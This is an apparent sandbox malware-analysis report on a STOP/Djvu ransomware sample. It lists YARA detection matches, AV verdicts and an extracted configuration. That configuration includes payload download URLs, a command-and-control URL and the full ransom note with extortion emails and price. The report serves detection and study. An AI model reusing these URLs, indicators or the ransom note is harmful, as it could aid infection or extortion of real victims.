1.0.bP5g4FsSJk.exe.400000.9.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
1.0.bP5g4FsSJk.exe.400000.9.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
1.0.bP5g4FsSJk.exe.400000.9.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
1.0.bP5g4FsSJk.exe.400000.9.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.0.bP5g4FsSJk.exe.400000.8.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
1.0.bP5g4FsSJk.exe.400000.8.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
1.0.bP5g4FsSJk.exe.400000.8.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
1.0.bP5g4FsSJk.exe.400000.8.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.0.bP5g4FsSJk.exe.400000.10.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
1.0.bP5g4FsSJk.exe.400000.10.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
1.0.bP5g4FsSJk.exe.400000.10.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
1.0.bP5g4FsSJk.exe.400000.10.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.0.bP5g4FsSJk.exe.400000.7.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
1.0.bP5g4FsSJk.exe.400000.7.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
1.0.bP5g4FsSJk.exe.400000.7.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
1.0.bP5g4FsSJk.exe.400000.7.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0.2.bP5g4FsSJk.exe.42d15a0.1.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xdf7ea:$s1: http:// 0xfd898:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101b2b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xffa26:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xdf7ea:$f1: http://
0.2.bP5g4FsSJk.exe.42d15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
0.2.bP5g4FsSJk.exe.42d15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
0.2.bP5g4FsSJk.exe.42d15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.0.bP5g4FsSJk.exe.400000.7.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
1.0.bP5g4FsSJk.exe.400000.7.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
1.0.bP5g4FsSJk.exe.400000.7.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
1.0.bP5g4FsSJk.exe.400000.7.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.0.bP5g4FsSJk.exe.400000.5.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
1.0.bP5g4FsSJk.exe.400000.5.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
1.0.bP5g4FsSJk.exe.400000.5.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
1.0.bP5g4FsSJk.exe.400000.5.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.0.bP5g4FsSJk.exe.400000.6.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
1.0.bP5g4FsSJk.exe.400000.6.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
1.0.bP5g4FsSJk.exe.400000.6.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
1.0.bP5g4FsSJk.exe.400000.6.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.2.bP5g4FsSJk.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
1.2.bP5g4FsSJk.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
1.2.bP5g4FsSJk.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
1.2.bP5g4FsSJk.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.0.bP5g4FsSJk.exe.400000.4.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
1.0.bP5g4FsSJk.exe.400000.4.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
1.0.bP5g4FsSJk.exe.400000.4.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
1.0.bP5g4FsSJk.exe.400000.4.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.0.bP5g4FsSJk.exe.400000.8.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
1.0.bP5g4FsSJk.exe.400000.8.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
1.0.bP5g4FsSJk.exe.400000.9.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe23ea:$s1: http:// 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe23ea:$f1: http://
1.0.bP5g4FsSJk.exe.400000.8.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
1.0.bP5g4FsSJk.exe.400000.8.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
1.0.bP5g4FsSJk.exe.400000.9.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
1.0.bP5g4FsSJk.exe.400000.9.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
1.0.bP5g4FsSJk.exe.400000.9.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
Click to see the 64 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: bP5g4FsSJk.exe

ReversingLabs: Detection: 52%

Antivirus detection for URL or domain

Source: http://acacaca.org/test2/get.php

Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: bP5g4FsSJk.exe

Joe Sandbox ML: detected

Source: 1.0.bP5g4FsSJk.exe.400000.8.unpack

Malware Configuration Extractor: Djvu {"Download URLs": ["http://rgyui.top/dl/build2.exe", "http://acacaca.org/files/1/build3.exe"], "C2 url": "http://acacaca.org/test2/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\W

Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	1_2_0040E870
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	1_2_0040EAA0
Source: C:\Users\user\Desktop\bP5g4FsSJk.exe	Code function: 1_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	1_2_00410FC0

Source: bP5g4FsSJk.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49737 version: TLS 1.2

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: bP5g4FsSJk.exe, bP5g4FsSJk.exe, 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bP5g4FsSJk.exe, 00000001.00000000.273505881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bP5g4FsSJk.exe, 00000001.00000000.272056178.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: 9IC:\nedunesa\gihex\gakubeki53_gaboru\lulod mamere\hexumax.pdb` source: bP5g4FsSJk.exe
